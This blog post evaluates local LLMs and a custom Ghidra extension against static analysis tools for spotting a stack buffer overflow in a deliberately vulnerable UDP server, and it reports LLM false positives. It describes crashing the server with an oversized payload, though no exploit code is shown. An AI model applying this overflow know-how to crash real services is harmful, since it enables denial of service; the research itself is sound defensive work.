AI vs. traditional tools: highlighting buffer overflows

Overview

Large language models (LLMs) have emerged as powerful tools for source code analysis, leveraging advances in artificial intelligence and natural language processing. These models are trained on vast datasets of code and documentation, enabling them to understand programming languages and coding patterns. LLMs can perform a variety of tasks, from code completion and generation to bug detection and code refactoring.

The idea of this blog post is to use open-source software tools to analyze unknown binaries for buffer overflows. In particular we are focusing on using Ollama³ to access multiple large language models. Ollama is a platform designed to simplify the deployment and usage of LLMs on local machines.This enables private data to be held locally instead of being sent to a cloud for processing.

We will also be comparing the results from the LLMs with CWE_Checker², which is a static analysis tool for ELF binaries.

The Example Test Binary

For testing we will be using an example piece of ‘C’ source code which implements a simple UDP server. This will represent the unknown binary that contains several bugs, one of which is a buffer overflow. This will be compiled on Ubuntu Linux with stack canaries turned off (to keep the code simple) to generate an executable ELF x86 binary.

Code Sample

The following code shows the buffer overflow vulnerability.

Using Python, we can easily exploit the buffer overflow vulnerability and cause the server to crash.

Stack Layout

The image below shows the stack after the execution has entered the function getpkt().

The following image details why it takes 536 bytes to crash the UDP Server and not 513 bytes which would be one byte more than the buffer can hold (512 bytes).

So now we know what the issue is, lets see how binary analysis tools can help identify the vulnerabilities.

Static Analysis

Using CWE_Checker² on the test binary highlights a number of issues. Most importantly it spots the main buffer overflow at address 0x0010139b, which is the recvfrom function call in getpkt().

While analyzing the test binary we tried a Python script¹ that uses a different approach to finding stack-based buffer overflows in ‘C’ code, to see if it could do any better. After fixing some bugs, adding in the recvfrom function call to analyze, we finally got some usable output.

As you can see from the output a lot more detail is given about the buffer overflow. While this approach may work it is very fragile, as it heavily depends on the format of the Ghidra assembly listing.
Both static analysis tools require the user to have a good understanding of ‘C’ to actually spot the error in the code. Also note that both static analysis tools failed to identify the potential overflow when writing the null termination character.

LLM Analysis

Using Large Language Models for code analysis is not a new idea. The aim of this research is to test the use of LLMs for helping to reverse engineer unknown binaries and to help identify potential bugs. We decided to develop a Ghidra extension that could be used to automate tasks such as function renaming, function explanation, vulnerability checking etc and to interact with various LLMs to compare the outputs.

Ghidra Extension - Revit

Using GhidrOllama⁴, ReVa⁵ Plugin and Rhabdomancer⁶ as references, we quickly developed a proof-of-concept Ghidra extension called Revit written in Java. The Revit extension provides a context menu when in the code de-compilation window as shown below.

The ‘Analyze Bad Funcs’ option is the only option that does not use the LLM. This option simply bookmarks and comments the locations of the bad functions found in the binary. The list of bad functions is a hard coded list of know functions such as memcpy, sprintf etc.

Analyze Single Func

This attempts to rename all the functions in the call chain leading to the specified function. The idea behind this analysis is to try and help identify the purpose/use of the specified function. This is useful in Ghidra when a large binary has been analyzed and the functions have been named similar to ‘FUN_001010e0’.

This can help identify the high-level functionality of the call chain by using the LLM to rename functions based on their content and actions.

Ask Question / Ask Follow on Question

These two options allow for any question to be asked relating to the currently decompiled function. Ask Question starts a new conversation, while Ask Follow on Question keeps track of the context and provides is along with the follow-on question.

Explain Func

Explains the current decompiled function based on its content and adds a plate comment to the function.

If you are not familiar with ‘C’ code, then this description may still enable you to understand what the function does at a high level.

Find Vulnerabilities

For penetration testing purposes this is probably the most useful function, as it attempts to identify vulnerabilities from the decompiled source code.

It is worth noting that the general settings for each LLM are set to the same and the prompt is also the same, so the only changing factor is the LLM in use.

Seed	123
Temperature	0
Top K	40
Top P	0.85
Input	Decompiled function getpkt()
Prompt	Find as many vulnerabilities as you can in this function? List them by type, severity and give a short description.Respond using JSON.

Although the LLM models generally perform well in the other tasks described in this blog, using them for locating vulnerabilities does not work so well. In the following examples, only the LLM is changed (dolphin-mistal, llama3.1, deepseek-coder-v2).

The vulnerability highlighted in red in the above image is a bit misleading, this is probably referring to the ‘cliaddr’.

In the above example, the two vulnerabilities highlighted in red are actually false statements. MSG_WAITALL is used, and the buffer is terminated eventually (although not before it is read by the printf call).

The Denial-of-Service vulnerability highlighted in red above, is a false statement as the recvfrom function will return when it has received the maximum number of bytes specified (1500).

The Integer Overflow vulnerability is the same as in example 1.

The last example used the entire original source code instead of the decompiled code for the single function getpkt(), which would provide the complete context for the LLM.

As we can see from the vulnerability highlighted in green, a much more specific answer was generated. We can see from the red highlight below that false vulnerabilities are still generated.

Rename Func

Rename Func uses the LLM to analyze the decompiled code in an attempt to rename the function based on the actual functionality. This is useful to help understand the high-level program flow by renaming the Ghidra named functions starting with ‘FUN_’.

Real World Test

As a simple test we used a bug (nccgroup.com/us/research-blog/exploit-the-fuzz-exploiting-vulnerabilities-in-5g-core-networks/) previously found using fuzzing techniques, to see if the LLM could find the same bug.

Using the same prompt and the original source code, we can see that the LLM recognizes the length value is coming from the source string and identifies this as a potential issue. This is a fairly simple example which the LLM has performed reasonably well.

Conclusions

As we can see from the results, open source LLMs with no modifications are quite good at some of the tasks presented. However, the more complex task of analyzing decompiled and potentially incomplete code is more challenging.

Using code generated by humans provides better results than functionally the same code produced by Ghidra. This is probably due to the training material used for most of these LLMs. This potentially explains why the models do not perform so well when presented with decompiled code from Ghidra.

The results also show that LLMs can hallucinate and generate incorrect responses, however most of the time the vulnerabilities returned were valid with the odd error. So, although the models do not produce 100% accurate responses, the output is still helpful as a starting point.

No real effort has been put into prompt engineering at this point. This initial investigation has shown the potential of LLMs for aiding with reverse engineering and vulnerability identification, although further work is required to improve the ‘Find Vulnerabilities’ functionality.

Further Investigation

As an example of how much the prompt construction matters, a quick test was performed using the same getpkt() function decompiled from Ghidra. We changed the prompt to give an example and added a system prompt. A Web UI was used to send the prompt to the model in this example. Observe how much more specific the results are compared to the same output from earlier.

Here are some thoughts on further work that could help improve the use of LLMs for the tasks mentioned in this blog post.

Prompt Engineering

Prompt engineering for large language models involves crafting input prompts to optimize the model responses. Here are a few approaches to examine:

Zero-Shot Prompting – Directly asking the model to perform a task without any examples, relying on its training to understand the request.

Multi-Shot Prompting – Providing a few examples of the desired input output pairs within the prompt to guide the model on how to respond.

Chain-of-Thought Prompting – Encourage the model to elaborate on its reasoning process by explicitly asking it to think step-by-step, which can enhance problem-solving and complex task performance.

Contextual Prompting – Include relevant background information or context in the prompt to help the model understand the scenario or domain better.

Role-based Prompting – Assign roles to the model (e.g., “You are a teacher. Explain…”) to lead the model’s responses in a particular direction.

Embeddings

Embeddings are numerical representations of data that allow models, including LLMs, to understand and process text effectively.

Text embeddings map words, phrases, or entire documents into high-dimensional vector spaces. Each vector captures semantic relationships, meaning similar texts are closer together in this space.

LLMs often use pretrained embeddings like Word2Vec, GloVe, or sentence embeddings from models like Sentence-BERT. These embeddings form the basis for understanding context and meaning.

Fine Tunning

Fine-tuning refers to the process of taking a pretrained model and training it further on a specific, often smaller, dataset to adapt it for a particular task or domain.

Fine-tuning allows the model to specialize in particular tasks by adjusting its parameters based on relevant examples. This typically requires significantly less data than pretraining because the model already has a foundational understanding of language. However, the quality and relevance of the fine-tuning data is crucial for success.